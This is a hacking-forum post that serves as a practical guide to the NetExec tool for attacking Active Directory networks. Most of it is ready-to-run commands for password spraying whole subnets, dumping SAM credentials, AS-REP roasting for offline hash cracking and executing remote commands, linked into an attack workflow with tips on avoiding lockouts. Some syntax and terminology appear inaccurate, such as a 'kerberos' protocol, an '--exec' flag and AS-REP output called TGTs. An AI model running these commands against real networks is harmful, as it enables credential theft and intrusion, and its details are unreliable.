dEEpEst
☣☣ In The Depths ☣☣
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
- Joined
- Mar 29, 2018
- Messages
- 13,859
- Solutions
- 4
- Reputation
- 27
- Reaction score
- 45,545
- Points
- 1,813
- Credits
- 55,080
‎7 Years of Service‎
56%


Netexec is a powerful post-exploitation and enumeration tool designed for red team operations in Active Directory environments.
It replaces CrackMapExec and improves functionality, speed, and modularity. Below is a complete guide with examples and advanced usage.
Disclaimer: This content is for educational purposes only and must be used exclusively in authorized environments.
Neither the author nor the HTDark community is responsible for any misuse.
What is Netexec?
Netexec (formerly known as CrackMapExec 6.x) is a Swiss army knife for AD network reconnaissance and exploitation.
It allows enumeration, authentication testing, command execution, file interaction, and more across SMB, WinRM, SSH, MSSQL, LDAP, and Kerberos.
Installation
Bash:
pipx install git+https://github.com/Pennyw0rth/NetExec.git
# Or using pip:
pip install git+https://github.com/Pennyw0rth/NetExec.git
Modules Supported
- smb
- winrm
- ssh
- mssql
- ldap
- kerberos
Basic Syntax
Bash:
netexec <protocol> <target> -u <user> -p <pass>
Examples
Enumerate SMB shares and users:
Bash:
netexec smb 192.168.1.10 -u user -p pass
Execute command over WinRM:
Bash:
netexec winrm 192.168.1.10 -u Administrator -p pass --exec whoami
Check local admin access across a subnet:
Bash:
netexec smb 192.168.1.0/24 -u user -p pass --local-auth
Kerberos brute-force using AS-REP roasting:
Bash:
netexec kerberos <DC-IP> -u usernames.txt --asreproast
Spray passwords over SMB (password spraying):
Bash:
netexec smb 192.168.1.0/24 -u users.txt -p "Summer2024" --continue-on-success
Useful Options
- -u / -p = username/password (or -U/-P for files)
- --local-auth = authenticate locally instead of domain
- --shares = enumerate accessible shares
- --sessions = list active sessions
- --sam = dump user accounts (if permissions allow)
- --exec <cmd> = run remote command (WinRM or SMB)
- --kerberos = use Kerberos auth with ticket
- --asreproast / --kerberoast = extract TGTs or service tickets for offline cracking
Tips & Tricks
- Use spray techniques carefully: Add delays or restrict to avoid account lockouts
- Chain with Impacket tools: Use hashes/tickets dumped with Netexec in `secretsdump`, `psexec`, etc.
- Crack TGTs with Hashcat: Format them from Netexec’s output and feed to Hashcat with `-m 18200`
- Use `--json` output: For parsing results with automation/scripts
- Proxy support: Through SOCKS with `proxychains` if needed
Real-World Workflow
Bash:
# 1. Password spray
netexec smb 10.0.0.0/24 -u users.txt -p "Welcome123" --continue-on-success
# 2. Enumerate shares and sessions
netexec smb 10.0.0.15 -u user -p pass --shares --sessions
# 3. Dump SAM (if admin)
netexec smb 10.0.0.15 -u user -p pass --sam
# 4. Execute command via WinRM
netexec winrm 10.0.0.15 -u Administrator -p pass --exec "whoami"
Resources & Links
-
This link is hidden for visitors. Please Log in or register now.
-
This link is hidden for visitors. Please Log in or register now.
-
This link is hidden for visitors. Please Log in or register now.

Which modules or tricks work best in your red team engagements?
Drop your insights and join the discussion!
Last edited: